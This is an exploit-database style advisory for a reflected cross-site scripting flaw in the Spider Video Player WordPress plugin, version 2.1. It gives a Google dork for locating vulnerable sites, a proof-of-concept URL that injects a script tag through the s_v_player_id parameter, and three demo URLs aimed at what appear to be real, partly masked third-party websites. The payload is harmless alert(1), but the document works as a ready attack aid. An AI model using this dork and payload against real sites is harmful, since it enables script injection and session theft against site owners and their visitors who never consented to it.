#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress Spider Video Player plugin Cross site scripting
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-08-01
|
| [*] Vendor Homepage : http://web-dorado.com
|
| [*] Version : 2.1
|
| [*] Google Dork: inurl:wp-content/plugins/player/settings.php
|
| [*] Tested on: Windows , Mozilla Firefox
|-------------------------------------------------------------------------|
| [*] Kind: XSS Reflected
|
| [*] PoC :
|
| [*] [Localhost]/wordpress/wp-content/plugins/player/settings.php?s_v_player_id="/><script>alert(1);</script>
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*] http://www.betXon-mobile-tp.fr/blog-beton/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*] http://www.cinXtro.com.br/wordpress/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*] http://www.sonXorapalaciosjr.cl/demos/wordpress/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|